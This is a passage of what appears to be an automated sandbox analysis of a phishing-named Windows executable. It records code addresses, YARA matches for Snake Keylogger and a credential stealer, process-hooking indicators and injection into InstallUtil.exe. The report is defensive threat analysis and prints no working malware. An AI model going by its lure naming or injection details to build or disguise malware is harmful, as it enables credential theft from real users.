                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeCode function: 0_2_080BF8F00_2_080BF8F0
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeCode function: 0_2_080BF9000_2_080BF900
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeCode function: 0_2_0819EC780_2_0819EC78
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeCode function: 0_2_0819FAA70_2_0819FAA7
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeCode function: 0_2_0819EC690_2_0819EC69
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeCode function: 0_2_068175880_2_06817588
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeCode function: 0_2_068175980_2_06817598
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeCode function: 0_2_080B00400_2_080B0040
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeCode function: 0_2_080BA6DF0_2_080BA6DF
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeCode function: 0_2_080BA6E00_2_080BA6E0
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeCode function: 0_2_081900130_2_08190013
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeCode function: 0_2_081900400_2_08190040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_02A3D2785_2_02A3D278
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_02A353625_2_02A35362
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_02A3A0885_2_02A3A088
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_02A371185_2_02A37118
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_02A3C1465_2_02A3C146
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_02A3C7385_2_02A3C738
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_02A3C4685_2_02A3C468
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_02A3CA085_2_02A3CA08
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_02A369A05_2_02A369A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_02A3E9885_2_02A3E988
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_02A33E095_2_02A33E09
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_02A3CFAA5_2_02A3CFAA
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_02A3CCD85_2_02A3CCD8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_02A3F6315_2_02A3F631
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_02A3FA885_2_02A3FA88
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_02A329E05_2_02A329E0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_02A3E97A5_2_02A3E97A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_06691E805_2_06691E80
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_06690B305_2_06690B30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_066917A05_2_066917A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_066950285_2_06695028
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_06699C185_2_06699C18
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_066929685_2_06692968
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_066995485_2_06699548
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_06691E705_2_06691E70
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0669E24A5_2_0669E24A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0669E2585_2_0669E258
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0669DE005_2_0669DE00
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0669EAF85_2_0669EAF8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0669E6AF5_2_0669E6AF
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0669E6A05_2_0669E6A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0669E6B05_2_0669E6B0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0669EF605_2_0669EF60
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0669EF515_2_0669EF51
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_066993285_2_06699328
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_06690B205_2_06690B20
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0669EB085_2_0669EB08
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_06698BA05_2_06698BA0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0669F3B85_2_0669F3B8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0669178F5_2_0669178F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_06698B905_2_06698B90
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0669FC685_2_0669FC68
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_066900405_2_06690040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0669FC5F5_2_0669FC5F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0669F8025_2_0669F802
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_066900065_2_06690006
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_066950185_2_06695018
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0669F8105_2_0669F810
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0669D0F85_2_0669D0F8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0669CCA05_2_0669CCA0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0669CC8F5_2_0669CC8F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0669D5405_2_0669D540
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0669D5505_2_0669D550
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0669DDFF5_2_0669DDFF
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0669DDF15_2_0669DDF1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0669D9A85_2_0669D9A8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0669D9995_2_0669D999
                    Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeStatic PE information: invalid certificate
                    Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2479444618.0000000008080000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameRP8SH.dll6 vs RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe
                    Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2475804920.0000000005620000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameVeloritaApp.dll8 vs RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe
                    Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2462750142.000000000149E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe
                    Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000000.1733485715.0000000000D7A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSky Email Verifier.exeF vs RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe
                    Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2474193722.0000000004215000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe
                    Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2474193722.0000000004215000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameVeloritaApp.dll8 vs RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe
                    Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2463896944.000000000358E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe
                    Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2474193722.0000000004109000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe
                    Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeBinary or memory string: OriginalFilenameSky Email Verifier.exeF vs RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe
                    Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.418f712.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.418f712.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.418f712.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4258950.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4258950.5.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4258950.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4109562.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4109562.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4109562.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.414c642.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.418f712.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4215892.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4215892.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4215892.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.414c642.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.414c642.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.418f712.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.418f712.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4258950.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4258950.5.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4109562.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4109562.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4258950.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.414c642.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.414c642.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4109562.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4215892.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4215892.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.414c642.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 00000005.00000002.2988851400.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 00000000.00000002.2474193722.0000000004109000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 00000000.00000002.2474193722.0000000004215000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Process Memory Space: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe PID: 7380, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Process Memory Space: InstallUtil.exe PID: 7968, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/1@4/4
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.logJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: NULL
                    Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeReversingLabs: Detection: 36%
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeFile read: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeJump to behavior
